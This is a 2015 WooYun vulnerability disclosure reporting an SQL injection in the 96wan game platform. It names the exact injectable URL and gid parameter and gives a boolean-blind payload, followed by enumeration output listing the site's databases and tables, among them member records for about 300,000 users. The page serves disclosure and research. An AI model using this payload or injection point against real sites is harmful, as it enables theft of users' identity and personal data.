当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:
wooyun-2015-0156804
漏洞标题:
96wan游戏平台存漏洞#涉及30万用户信息(身份证#姓名#邮箱等)
相关厂商:
96wan游戏平台
漏洞作者:
AuGe
提交时间:
2015-11-30 09:46
修复时间:
2016-01-14 09:46
公开时间:
2016-01-14 09:46
漏洞类型:
SQL注射漏洞
危害等级:
自评Rank:
18
漏洞状态:
未联系到厂商或者厂商积极忽略
漏洞来源:
http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签:
分享漏洞:
4人收藏 收藏
分享漏洞:
>

漏洞详情

披露状态:

2015-11-30: 积极联系厂商并且等待厂商认领中,细节不对外公开
2016-01-14: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

RT

详细说明:

注入地址

#SQL注入
URL:
http://www.96wan.com/websiteapi/website_serverlist?gid=6	参数gid可控

漏洞证明:

泄露6个数据库

Parameter: gid (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: gid=6 AND 1429=1429
---
back-end DBMS: MySQL 5
available databases [6]:
[*] `96wan_ucenter` 
[*] `96wan_web` //主站数据库
[*] `96wan_wp`
[*] information_schema
[*] mysql
[*] performance_schema


#不深入直接查下主库信息(member敏感信息泄露30万数据)

member.jpg


newcard.jpg


Database: 96wan_web
+-------------------------+---------+
| Table                   | Entries |
+-------------------------+---------+
| `96wan_game_log`        | 4680784 |
| `96wan_login_log`       | 3916792 |
| `96wan_member_info`     | 309322  |
| `96wan_register_log`    | 308966  |
| `96wan_newcard`         | 155681  |
| `96wan_newcard2`        | 150832  |
| `96wan_channel_member`  | 93985   |
| `96wan_pay_log`         | 75946   |
| `96wan_pay_ok`          | 44113   |
| `96wan_pay_togame`      | 44113   |
| ku36_game_log           | 31458   |
| `96wan_code_log`        | 19938   |
| `96wan_lhzs_card`       | 12349   |
| ku36_member_info        | 4924    |
| `96wan_channel_info`    | 3797    |
| `96wan_area`            | 3144    |
| `96wan_verify_email`    | 1901    |
| `96wan_game_server`     | 622     |
| `96wan_forgetpwd`       | 404     |
| `96wan_channel`         | 380     |
| `96wan_city`            | 340     |
| `96wan_article`         | 311     |
| `96wan_access`          | 197     |
| `96wan_friendlink`      | 114     |
| `96wan_union_channel`   | 102     |
| `96wan_password_appeal` | 97      |
| `96wan_lhzs_usecard`    | 96      |
| `96wan_node`            | 82      |
| `96wan_test_account`    | 50      |
| `96wan_phone_code_log`  | 46      |
| `96wan_union_members`   | 40      |
| `96wan_province`        | 34      |
| `96wan_channel_source`  | 33      |
| `96wan_game`            | 25      |
| `96wan_pay_type`        | 20      |
| `96wan_slidepic`        | 19      |
| `96wan_role_user`       | 17      |
| `96wan_tg_pass`         | 16      |
| `96wan_pay_test`        | 12      |
| `96wan_notice`          | 7       |
| `96wan_singlepage`      | 7       |
| `96wan_group`           | 6       |
| `96wan_channel_ts`      | 5       |
| `96wan_role`            | 5       |
| `96wan_user`            | 4       |
| `96wan_category`        | 3       |
| `96wan_dept`            | 3       |
| `96wan_groups`          | 3       |
| `96wan_union`           | 2       |
| `96wan_card`            | 1       |
| `96wan_code`            | 1       |
| `96wan_phone_code`      | 1       |
| `96wan_sygame`          | 1       |
| `96wan_tg_paytype`      | 1       |
+-------------------------+---------+

修复方案:

参数可控 代码农过滤吧

版权声明:转载请注明来源 AuGe@乌云

>

漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝

漏洞Rank:15 (WooYun评价)